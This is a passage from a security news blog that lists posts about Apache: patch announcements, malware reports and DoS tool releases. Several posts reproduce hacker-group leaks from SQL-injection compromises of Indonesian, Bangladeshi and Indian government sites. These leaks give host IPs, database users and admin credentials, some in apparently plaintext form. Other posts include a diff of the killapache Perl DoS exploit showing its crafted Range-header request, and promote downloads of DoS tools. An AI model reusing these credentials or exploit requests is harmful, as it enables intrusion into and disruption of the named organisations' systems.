Showing posts sorted by relevance for query Apache. Sort by date Show all posts
Showing posts sorted by relevance for query Apache. Sort by date Show all posts

Armageddon (DDoS Botnet) Started Integrating Apache Killer Exploit

Posted by Avik Sarkar On 3/09/2012 05:50:00 pm

Armageddon (DDoS Botnet) Started Integrating Apache Killer Exploit

The latest version of Denial of Service Bot (DDoS) named Armageddon integrates a relatively new exploit known as Apache Killer. Armageddon is a Russian malware family exclusively designed to launch DDoS attacks. Because it is sold as a toolkit on underground forums, there is more than one Armageddon-powered botnets on the Internet. Aside from the Apache Killer exploit, the latest Armageddon version also incorporates other application-layer DDoS techniques that target popular Internet forum platforms like vBulletin or phpBB, however these are not particularly ground-breaking.
The Apache Killer exploit was released in August 2011. It exploits a vulnerability in the Apache Web server by sending a specially crafted "Range" HTTP header to trigger a denial-of-service condition. The attack is particularly dangerous because it can be successfully executed from a single computer and the entire targeted machine needs to be rebooted in order to recover from it. The vulnerability exploited by Apache Killer is identified as CVE-2011-3192 and was patched in Apache HTTPD 2.2.20, a week after the exploit was publicly released. Apache 2.2.21 contains an improved fix.
Recommendation:-
System administrators should upgrade their Apache servers to the latest available version or should implement known work arounds. "There is an update to the Apache mod_security module that attempts to address this type of attack by filtering requests with 'Range' headers that are too large.

-Source (PC World)




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Apache Web Server Under Stealth Attack

Posted by Avik Sarkar On 5/05/2011 10:43:00 am

 
Online attackers seem to love to exploit Web servers, because they can add scripts that quickly and automatically add malicious links to static HTML pages via an iFrame tag, or code that attempts to exploit website visitors' PCs via drive-by downloads. But an attack discovered on Friday, dubbed Apmod, pushes this attack technique one step further by not just infecting static Web pages. "The attack was unusual in that the Web server itself was the infection target," said Cathal Mullaney, a security response engineer at Symantec, in a blog post. "When a Web server is infected like this, every user that requests any Web page from that Web server is a potential victim. This is opposed to cases where static Web pages are infected with malicious code--only those specific pages put a user at risk of infection."
This new attack, which has been seen in the wild but doesn't currently appear to be widespread, targets the popular Apache Web Server, which runs on Windows and Linux. According to Netcraft, Apache Web Server is now used to host about 204 million websites.
The attack is innovative in that it uses Apache's built-in filter capabilities. A filter, as defined by Apache, "is a process that is applied to data that is sent or received by the server," and can be used to add functionality without rewriting the code base. Many websites use this capability to add advertisements to Web pages on the fly, while also tracking that advertising delivery to generate revenue via ad agencies.
"We have discovered a malicious module that performs identical steps in order to include links to malicious websites," said Mullaney. "All of the actions performed by the rogue module are done using legitimate code provided by the Apache API, specifically for this type of on-the-fly content generation. This is not an exploit or a hack of Apache's code base; the module uses Apache's inherent functionality to infect users and attempts to redirect them to a malicious Web page."
Interestingly, the module doesn't attempt to infect every Web page it serves. In fact, it includes a number of anti-detection capabilities, including watching for signs of administrator access or processes and avoids serving malware to search engines. Furthermore, when it does serve a Web page infected with links to malicious websites, the module then temporarily blacklists the user's IP address to avoid delivering multiple, infected Web pages, which might make its activities easier to detect. It then queries a command and control server to provide a new iFrame tag, further hampering detection.
As a result, "this is a complex and potentially difficult threat to detect accurately," said Mullaney. "As the rogue module contains a number of evasion techniques, it is possible that a system administrator would not notice the infection for some time. A further difficulty in detecting the threat is the on-the-fly nature of the infection. Since no Web pages are infected on the disk, no detections on stored HTML pages are possible."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Apache 2.2.20 Released (DDoS Vulnerability Fixed)

Posted by Avik Sarkar On 9/01/2011 03:37:00 pm


This afternoon the Apache Foundation released an awaited fix to the denial of service (DoS) vulnerability reported a few days ago. The fixes in version 2.2.20 of the Apache httpd server reduce the amount of memory that is used by range requests. If the total bytes of a file requested exceed the total file size, httpd will return the entire file. This follows closely on the heels of a tool released to the Full Disclosure mailing list this week that exploits the flaw. Apache web administrators are encouraged to apply this fix immediately. Unfortunately, as we see all too frequently, many Linux and Unix administrators "set and forget" their installations and never bother to look after their servers.
The Apache team should be applauded for testing and releasing an important security fix so quickly. Now it is up to you, the IT administrators who are using Apache, to follow through and apply these fixes.

For More information, to see the official release of Apache notes and patches of that vulnerability click Here

-News Source (NS & Apache)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Linux/Cdorked.A: One of The Most Sophisticated Apache Backdoor Targets Millions of Websites

Posted by Avik Sarkar On 5/05/2013 03:11:00 pm

Linux/Cdorked.A: One of The Most Sophisticated Apache Backdoor Targets Millions of Websites to Serve Blackhole Exploit

ESET one of the world renowned security firm headquartered in Bratislava have figured out what it called a malicious cyber rampage targeting millions of cPanel-based servers. Since last few months security experts have been tracking server level compromises that have been utilizing malicious Apache modules to inject malware into websites and  redirecting some of its requests to the infamous Blackhole Exploit packs. On cPanel-based servers, instead of adding modules or modifying the Apache configuration, the attackers started to replace the Apache binary (httpd) with a malicious one. This new backdoor is very sophisticated and this new malware has been dubbed "Linux/Cdorked.A." Several analysis reveals that it is a sophisticated and stealthy backdoor meant to drive traffic to malicious websites. According to the official blog post of ESET - Linux/Cdorked.A is one of the most sophisticated Apache backdoor's we have seen so far. The backdoor leaves no traces of compromised hosts on the hard drive other than its modified httpd binary, thereby complicating forensics analysis. All of the information related to the backdoor is stored in shared memory. The configuration is pushed by the attacker through obfuscated HTTP requests that aren't logged in normal Apache logs. This means that no command and control information is stored anywhere on the system.
This malicious cyber rampage was first detected by another security firm named 'Sucuri' and later ESET published a detailed analysis of the issue. But still there are thoughtful matter as already thousands of websites get infected. The attack is particularly dangerous as Apache web servers are among the most well-known and widely-used in the world and are used by numerous companies. This means that a successful security breach can affect numerous different businesses across a diverse range of industries.
As this malware also known as Linux/Cdorked.A has already been spotted in the wild, so on behalf of cyber media, we urge all the concern system administrator, security analyst to take care of the above issue while to checking their servers and verify that they are not affected by this threat. Detailed instructions to perform this check are provided in the ESET blog.





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

The Apache Struts 2.3.1.2 Closes Remote Command Execution Vulnerability

Posted by Avik Sarkar On 1/25/2012 11:33:00 pm

The Apache Struts 2.3.1.2 Released & Closes Remote Command Execution Vulnerability
The Apache Struts group today officially declared that Struts 2.3.1.2 is available as a "General Availability" release. This closes a critical hole in versions of Struts from 2.0.0 to 2.3.1.1 that allowed for remote command execution. The vulnerability makes it possible for the protection around OGNL, an expression language used for getting and setting properties of Java objects, to be bypassed and arbitrary expressions be evaluated.

Brief About Apache Struts :-
Apache Struts 2 is an elegant, extensible framework for creating enterprise-ready Java web applications. The framework is designed to streamline the full development cycle, from building, to deploying, to maintaining applications over time.

This release includes some important security fix:
  • ParameterInterceptor vulnerability allowed remote command execution

To Download The Apache Struts 2.3.1.2 Click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

killapache Modified Exploit (DDOS Tool For Apache Web Server)

Posted by Avik Sarkar On 10/04/2011 03:47:00 pm


Earlier we have talked about killapache (DDOS Tool For Apache Web Server) it was coded by kingscope’s , re-edited and coded by “S4(uR4″ , which kills apache and still many websites are vulnerable.

Difference Between Old and New Modified Exploit:-
40c40
< $p = “HEAD / HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn”; — > $p = “HEAD “.($ARGV[2] ? $ARGV[2] : “/”).”HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn”;

56c56
< $p = “HEAD / HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn”; — > $p = “HEAD “.($ARGV[2] ? $ARGV[2] : “/”) .” HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn”;

73c73
< if ($#ARGV > 1) {
> if ($#ARGV > 0) {

How the code works:-
killapache sends GET requests with multiple “byte ranges” that will claim large portions of the system’s memory space. A “byte range” statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.
There is no patch yet released for this vulnerability on apache, but a few work arounds have been found we have also discussed about it in our previous post. These have been posted by The Apache Software Foundation and can be used until a stable fix is released.The vulnerability works by exploiting a feature in web servers that gives you the ability to pause and resume your downloads. These days if you have to stop downloading something part-way through you can generally pick up where you left off and you don’t have to start again from scratch.

To Download the new version Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

DDoS Tool For Apache Server 2.3.14

Posted by Avik Sarkar On 10/25/2011 03:42:00 pm

After killapache success yet another POC on apache for DDOS tools. Apache Server 2.3.14 Denial of Service (DDOS) Vulnerability exploit. Latest version of Apache Server 2.3.14 fails. The Egyptian Hacker and Exploit writer “Xen0n” discovered this Vulnerability and Develop an perl exploit for (DDOS) Vulnerability. The script is written in perl can be easily modified.

To Download POC Apache Server 2.3.14 Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Oracle Issued Security Update of DDoS Vulnerability in Apache HTTPD

Posted by Avik Sarkar On 9/18/2011 02:24:00 pm



Oracle, the giant enterprise database company - and, of course, owner of the erstwhile Sun Microsystems - has just published an out-of-band security update. This is only the fifth time Oracle has issued an alert outside its routine quarterly patch cycle since introducing its own version of Patch Tuesday at the start of 2005.

Description:-
This security alert addresses the security issue CVE-2011-3192, a denial of service vulnerability in Apache HTTPD, which is applicable to Oracle HTTP Server products based on Apache 2.0 or 2.2. This vulnerability may be remotely exploitable without authentication, i.e. it may be exploited over a network without the need for a username and password. A remote user can exploit this vulnerability to impact the availability of un-patched systems.

Affected Products and Versions:-

  • Oracle Fusion Middleware 11g Release 1, versions 11.1.1.3.0, 11.1.1.4.0, 11.1.1.5.0
  • Oracle Application Server 10g Release 3, version 10.1.3.5.0 (Only affected when Oracle HTTP Server 10g based on Apache 2.0 has been installed from Application Server Companion CD)
  • Oracle Application Server 10g Release 2, version 10.1.2.3.0 (Only affected when Oracle HTTP Server 10g based on Apache 2.0 has been installed from Application Server Companion CD)


Please note that Oracle Enterprise Manager includes the Oracle Fusion Middleware component that is affected by this vulnerability. Oracle Enterprise Manager is affected only if the affected Oracle Fusion Middleware version (noted above) is being used. Since a vulnerability affecting Oracle Fusion Middleware versions may affect Oracle Enterprise Manager, Oracle recommends that customers apply the fix for this vulnerability to the Oracle Fusion Middleware component of Oracle Enterprise Manager. For information on what patches need to be applied to your environments, refer to Security Alert CVE-2011-3192 Patch Availability Document, My Oracle Support Note 1357871.1.

Patch Availability:-
Patches and relevant information for protection against this vulnerability can be found Here
Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Security Alert fixes as soon as possible.

-News Source (Oracle)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Another DoS fix for Apache HTTP server

Posted by Avik Sarkar On 5/23/2011 10:39:00 pm


The update of the Apache HTTP Server (httpd) to version 2.2.18 earlier this month to close a denial of service (DoS) problem appears to have exposed a related DoS vulnerability. The developers have nowreleased httpd 2.2.19 to fix this new problem which has been rated as moderately critical; however, as with the previous DoS vulnerability, it requires that mod_autoindex is enabled in the web server.
It appears that the updated Apache Portable Runtime (APR) 1.4.4 – which was bundled with the server to correct the denial of service vulnerability – could cause httpd workers to enter a 100% CPU utilising hung state when calling apr_fnmatch. An update to APR, version 1.4.5, which resolves the issue has been released by the APR developers and is bundled with Apache HTTP Server 2.2.19. Users can upgrade to httpd 2.2.19 or, if running httpd 2.2.17 or earlier, work around the denial of service problem by using the "IgnoreClient" option of the "IndexOptions". The problem was first noted and tracked on Debian mailing lists.
The developers also took the opportunity to fix an inadvertently changed function signature for ap_unescape_url_keep2f which had broken binary compatibility with some third party modules. The 2.2.19 update to httpd is available to download from the project's download page. The updated APR 1.4.5 is also available for download for developers who use the library in other projects.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

DSH is Taking Anonymous More Seriously & Issued A Security Bulletin To Warn About The Upcoming Cyber Threats

Posted by Avik Sarkar On 9/05/2011 02:57:00 pm



The Department of Homeland Security is beginning to take Anonymous and other non-professional cyber-attackers more seriously as it issues a warning about potential attacks.
The United States Department of Homeland Security warned the security community about potential attacks from hacking collective Anonymous over the next few months. The Sept. 2 security bulletin from the DHS National Cyber-Security and Communications Integration Center warned financial services companies to be on the lookout for attackers operating under the Anonymous umbrella to "solicit ideologically dissatisfied, sympathetic employees" to the cause. The collective recently took to Twitter to persuade employees within the financial sector to hand over information and access to enterprise networks. Though such attempts may have been unsuccessful so far, "unwilling coercion through embarrassment or blackmail may be a risk to personnel," the DHS bulletin warned.
DHS issued the bulletin primarily for cyber-security professionals and staff in charge of protecting critical infrastructure. The bulletin also refer to new tools that Anonymous may be using in launching future attacks. Anonymous has been primarily using the Low Orbit Ion Cannon, a fairly simple testing software that can ping a server repeatedly, to launch its distributed denial of service attacks. Some of the members have been working on a new DDoS tool, based on JavaScript,  dubbed #RefRef.

The new attack tool is said to be capable of using the server's own resources and processing power to launch a denial of service attack against itself, but "so far it's unclear what the true capabilities of #RefRef are," the DHS said in the bulletin. The tool is slated to be released Sept. 17.
DHS also referenced the "Apache Killer" Perl script that can be used to launch denial of service attacks against Web servers running the popular Apache software. Apache developers released a patch earlier this week to fix the vulnerability in Apache 2.2. Administrators have been urged to patch their servers immediately.

The DHS also mentioned three cyber-attacks and civil protests Anonymous has already announced. "Occupy Wall Street" is the first scheduled one, for Sept. 17. Announced by a group Adbusters in July and actively supported by Anonymous, the goal is to get 20,000 individuals to gather on Wall Street to protest various U.S. government policies. Similar rallies targeting financial districts are being planned in Madrid, Milan, London, Paris and San Francisco.
Another protest in October, also led by Adbusters, is scheduled to be held at the Washington, D.C. National Mall to mark the 10th anniversary of the war in Afghanistan. There is also the supposed Nov. 11 attack against Facebook and Project Mayhem, scheduled for Dec. 21, 2012, DHS warned. There are indications that Project Mayhem would be a combination of physical disruption and targeting of information systems.

The bulletin itself is unusual in that DHS hasn't commented on the activities of Anonymous ever since the group stepped up its efforts over the past few months, attacking federal agencies and private corporations to protest a wide range of issues. As anyone following the security space undoubtedly knows, there have been at least one or two attacks by Anonymous, even more, each week for the past few months, so the bulletin may be just stating the obvious when warning of future potential attacks.
"Anonymous has shown through recently reported incidents that it has members who have relatively more advanced technical capabilities who can also marshal large numbers of willing, but less technical, participants for DDOS activities," the DHS said.

-News Source (e-Week)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

killapache (DDOS Tool For Apache Web Server)

Posted by Avik Sarkar On 8/28/2011 04:42:00 pm

A unknown flaw in the code for processing byte range headers allows versions 2.2.x of the Apache Web Server to be crippled from a single PC. A suitable “Apache Killer” Perl script that impressively demonstrates the problem. This has been assigned CVE-2011-3192 as its CVE identifier.

How killapache Works:-

killapache sends GET requests with multiple “byte ranges” that will claim large portions of the system’s memory space. A “byte range” statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.

To download the Killapache Perl file Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

PHP 5.3.11 & PHP 5.4.1 With Apache 2.4 support, Debug info Handler

Posted by Avik Sarkar On 4/28/2012 03:15:00 pm

PHP 5.3.11 & PHP 5.4.1 With Apache 2.4 support, Debug info Handler 

Couple of Months ago we got PHP 5.3.10 and that release closes some serious security holes like denial of service & remote code execution. Now the PHP development team announces the immediate availability of PHP 5.3.11 and PHP 5.4.1. These releases focuses on improving the stability of the current PHP branches with over 60 bug fixes, some of which are security related. 
Brief About PHP:- PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.

Security Enhancements for both PHP 5.3.11 and PHP 5.4.1:
  • Fixed bug #54374 (Insufficient validating of upload name leading to corrupted $_FILES indices). (CVE-2012-1172).
  • Add open_basedir checks to readline_write_history and readline_read_history.
Security Enhancement affecting PHP 5.3.11 only:
  • Fixed bug #61043 (Regression in magic_quotes_gpc fix for CVE-2012-0831).
Key enhancements in these releases include:
  • Added debug info handler to DOM objects.
  • Fixed bug #61172 (Add Apache 2.4 support).
For a full list of changes in PHP 5.3.11 and PHP 5.4.1, see the ChangeLog. For source downloads please visit our downloads page, Windows binaries can be found on windows.php.net/download/. All users of PHP are strongly encouraged to upgrade to PHP 5.3.11 or PHP 5.4.1.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

British Chamber of Commerce & Ministry of Culture and Tourism Indonesia Hacked By TEAM T!g3R

Posted by Avik Sarkar On 10/10/2011 05:45:00 pm


Vulnerability found by TEAM T!g3R on the official website of Ministry of Culture & Tourism and British Chamber of Commerce, Indonesia.
Vulnerable Website:-
http://www.budpar.go.id
http://www.britcham.or.id
 
Vulnerability:-
SQL-i
TEAM T!g3R also hacked into the database of these two websites and exposed sensitive data like server details, DB name, user name, password, admin details and so on.

Ministry of Culture & Tourism Indonesia:-
Admin Deatils:-
user       pass
admin     d3affb50918890deaf19360c7c?1d28
dadi       1601642654c68e2b?975be78915c8c7e
Database Name:-
Current DB:- budpar
Current DB:- information_schema
Web-Server:- Apache/2.2.14 (Fedora)
Hack Proof:-
For More information Click Here

British Chamber of Commerce Indonesia:-
Server Details:-
Target:-                 http://www.britcham.or.id
Host IP:-                202.67.9.74
Web Server:-         Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
Powered-by:-          PHP/5.2.17
DB Server:-            MySQL
Resp. Time(avg):-   2744 ms
Current User:-        britcham_user1@localhost
Sql Version:-           5.0.51a-community
Current DB:-           britcham_database
System User:-         britcham_user1@localhost
Host Name:-           asterix.serverku.com
Installation dir:-     asterix.serverku.com
Installation dir:-     /
DB User:-               'britcham_user1'@'localhost'
Admin Deatils:-
Data Found: user_name=britcham
Data Found: user_password=0b176060ef08c8d37d8aa756075c52ad
Data Found: user_id=1
Data Found: user_name=admin
Data Found: user_password=admin
Data Found: user_id=1
Hack Proof:-
For More information Click Here




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Kerala state social welfare dept & Advocate General Rajastan is Vulnerable to SQL-i

Posted by Avik Sarkar On 6/02/2011 02:09:00 am


The official website of Kerala state social welfare dept & Advocate General Rajastan  is Vulnerable to SQL-i. Those two are the Govt. site of India. This vulnerability has been found by Moofster

Kerala state social welfare dept:
Vulnerable Website:-  http://www.keralawomen.gov.in/
Host IP: 74.220.207.96
Web Server: Apache
Powered-by: PHP/5.2.17


Advocate General Rajastan:
Host IP: 210.212.105.51
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6

Admin details:
Data Found: password=0192023a7bbd73250516f069df18b500 (admin123 in plaintext)
Data Found: user_name=administrator

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

KillApachePy [Python version of Apache Killer]

Posted by Avik Sarkar On 11/27/2011 09:15:00 pm


Previously we have talked about the KillApache, the DDoS exploit which can kill the vulnerable Apache web server by performing massive denial of service of attack. Recently, Miroslav Å tampar one of the co-authors of the awesome sqlmap tool programmed a Python variant of the same attack with a few more options and called it KillApachePy.
KillApachePy is a Python version of the tool, which aims to be more user friendly and has few program workflow enhancements, like automatic usage of maximum (system) allowed thread number, setting custom HTTP method (GET/HEAD/…), custom target page for retrieval, proxy support, etc. As it always has been with his code, it is small, efficient and highly optimized.

For More Information & to Download The Source Code Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

CLUB HACK Magazine has been released

Posted by Avik Sarkar On 4/25/2011 02:03:00 pm


March witnessed the launch of the much awaited Mozilla Firefox 4. We dedicate this issue to Mozilla and even the cover page that I designed (ahem) reflects that. The month started on a high note with India finally winning the ICC World Cup that also awakened our patriotic feelings.
Keeping with the theme of browser security, this issue covers Mozilla Security in Tech Gyan, FireCAT in Tool Gyan, Being Invisible on the Internet in Moms Guide, Configuring Apache SSL in Command Line, Introduction to newly launched Matriux Vibhag and New Rules of Information Technology in Legal Gyan.
We at ClubHack Mag would like to thank our contributors for an overwhelming response to the call for articles for this issue. Browser security affects all users of the Internet and therefore, we have decided that to keep the same theme for our May issue.
Wireless networking is another issue that is now looming large on the horizon of most organisations and has even penetrated most tech-savvy homes. We intend to cover Wireless penetration testing for our subsequent issues. Keep sending your articles to info@chmag.in
Happy and Safe surfing!
In April issue we have the following articles

0x00 Tech Gyan - Mozilla Firefox Internals & Attack Strategies
0x01 Tool Gyan - FireCAT
0x02 Mom's Guide - Being Invisible on the Internet
0x03 Legal Gyan - The Information Technology Rules, 2011
0x04 Command Line Gyan - Configuring Apache SSL
0x05 Matriux Vibhag - Introduction Part 2
0x06 Poster of the month - Happy and Safe Surfing.
n India we were waiting to see any 'hacking' magazine to happen and the wait was getting little longer. So finally ClubHack decided to come up with its own 1st  Indian "Hacking" Magazine called CHmag.
We at ClubHack aremore than thrilled about the magazine and this fits into our main objective of making hacking and information security a common sense for a commn man.
Moving further we need a lot of help form the whole information security community of the country to make this a success
This magazine is divided into the following sections:
0x00 Tech Gyan of the month
0x01 Legal Gyan of the month
0x02 Tool Gyan of the month
0x03 Command Line Gyan of the month
0x04 Mom's Guide of the month
0x05 Awareness Poster of the month
We hope to add a lot of sections in future, all we need is input from you as to what you would like to see in your magazine
The PDF version can be downloaded from http://chmag.in/issue/apr2011.pdf

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Ubuntu 12.10 Codenamed "Quantal Quetzal" Beta 1 Released !!

Posted by Avik Sarkar On 9/10/2012 05:52:00 pm

Ubuntu 12.10 Codenamed "Quantal Quetzal" Beta 1 Released !!

After the release of two Alpha version (Alpha1 & Alpha 2), now its time for beta; and as expected both Canonical and the Ubuntu developer team has released the first beta of version 12.10 of their Ubuntu Desktop, Server, Cloud, and Core products, code named "Quantal Quetzal". Ubuntu 12.10 Beta 1 uses a Linux kernel which is based on the recent 3.5.3 Linux kernel, the current stable version of Linux 3.5.
12.10 continues Ubuntu's proud tradition of integrating the latest and greatest open source technologies into a high-quality, easy-to-use Linux distribution.  The team has been hard at work through this cycle, introducing new features and fixing bugs. For the client, this release now has a consolidated Ubuntu image.  There is no longer a traditional CD sized image, DVD or alternate image, but rather a single 800MB Ubuntu image that can be used from USB or DVD.  This change does not affect Ubuntu Server, which remains a traditional CD sized image.  With Ubuntu 12.10, Kubuntu, Edubuntu, Lubuntu, and Ubuntu Studio also reached Beta 1 status today.   These images, along with Xubuntu will continue to have daily updates for the remainder of the release. The final version of Ubuntu 12.10 is expected to be released on October 18, 2012

Key Features at a Glance:- 

  • The consolidated client images now support the logical volume manager (LVM) as well as full disk encryption.
  • Update Manager has been renamed Software Updater and now checks for updates when launched.
  • A new X.org stack has been introduced which includes xserver 1.13 candidate versions, mesa 9.0, and updated X libs and drivers. 
  • Unity has been updated to version 6.4 including support for dash previews and coverflow view.  Now that compiz with GLES support has  landed, unity-3d works again on the pandaboard.
  • The Ubuntu desktop has begun migrating from Python 2 to Python 3. Most Python applications included in the desktop is now using Python 3, and most Python modules that are included by default are available for both Python 2 and Python 3.



Changes in Ubuntu Server and Cloud Images:-

  • ARM hard float (armhf) cloud images are now available.
  • OpenStack folsom testing packages are available.  Openstack instance architecture testing support has been added, as has a heterogenous scheduler for ARM.
  • Apache Tomcat 7 is now the default supported version. Ceph has updated to 0.48.1 (upstream argonaut stable release), and includes RADOS Gateway (S3 and Swift Compatible), as well as performance improvements.
  • Floodlight (Openflow Network Controller) and mininet (Network Simulation) packages are now available.
According to the project's release schedule, the beta release will be followed by a second beta on 27 September. The current stable release is Ubuntu 12.04.1 LTS, the first point update to the Long Term Support (LTS) edition of the distribution.


To Download Ubuntu 12.10 Beta 1 (Both Ubuntu Desktop and Ubuntu Server) Click Here








SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Ministry of Civil Aviation & Tourism, Bangladesh Hacked By TEAM T!g3R

Posted by Avik Sarkar On 9/03/2011 05:06:00 pm


Ministry  of Civil Aviation & Tourism, Bangladesh is Vulnerable to SQL-i and the entire Database get hacked by TEAM T!g3R. They exposed sensitive  information like DB name, server details, admin credentials and lots of other things.

Vulnerable Site:-
http://www.mocat.gov.bd/

Vulnerable Link:-

Server Details:-

Target:         http://www.mocat.gov.bd/personnel.php?id=1
Host IP:        75.125.91.162
Web Server:  Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5        mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
                        mod_perl/2.0.5 Perl/v5.8.8

Powered-by:         PHP/5.2.17
DB Server:          MySQL >=5
Resp. Time(avg):    4767 ms
Current User:       mocatgo_mocatdb@localhost
Sql Version:        5.1.56-log
Current DB:         mocatgo_mocatdb
System User:        mocatgo_mocatdb@localhost
Host Name:         dhaka-bd2.number1shop.com
Installation dir:         /
DB User:         ' mocatgo_mocatdb'@'localhost'

User Credentials:-
admin          QQmoca3tad
jabed           QQrrtre
rubel           QQinfo@bdt
rumu           QQinfo
sdnp            QQqrr
tina             QQadmin

To see the hacked DB click Here

Here are Some screen Shots Submitted by The hacker:-

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Web hosting, Reseller, Vps & Dedicated services Provider Hosterbox is Vulnerable to SQL-i said Shadman Tanjim (BCA)

Posted by Avik Sarkar On 6/24/2011 05:03:00 pm



Web hosting, Reseller, Vps & Dedicated services Provider Hosterbox Hacked by Shadman Tanjim , Admin Bangladesh Cyber Army

According to the Hacker:- 

Website: www. hosterbox.com
Hacking Method: SQL Injection
Vulnerability risk: high
Host IP: 184.82.153.150
Web Server: Apache
Powered-by: PHP/5.2.16
Injected Link:


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Netsparker 2.0 Released (Web Application Security Scanner)

Posted by Avik Sarkar On 7/29/2011 05:00:00 pm

Mavituna Security has released V2.0 of its web application security scanner Netsparker. The new version includes 16 new security checks, 15 new features and a variety of minor improvements.
New in V2.0 is a Vulnerability Database with a list of known vulnerabilities for Apache, Tomcat, MSSQL and MySQL. When Netsparker identifies one of these systems, it’ll reference the database and report all known vulnerabilities for that particular version with severity, exploit details and CVE references.

The new security checks performed by Netsparker 2.0 include: SSL checks (Netsparker will report weak ciphers, self-signed SSLs and similar SSL / Certificate related issues), Tomcat default files checks, ASP.NET MVC version disclosure checks and  Mongrel / Nginx version disclosure checks.

The vulnerability engine has also been enhanced:

    * Improved Signature based SQL Injection detection
    * LFI checks improved and coverage increased
    * Attribute-based XSS checks improved
    * PHP source code disclosure checks improved
    * Protocol-based XSS attacks significantly improved
    * ASP.NET / .NET Framework 4 Viewstate support added. MAC Enabled and Encryption issues will also be reported correctly in .NET Framework 4 systems
    * ORACLE SQL Injection checks improved

On a lighter note, Mavituna Security are also proud of the new dramatic splash screen. You can’t beat that!

For more Information About Netsparker 2.0 click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search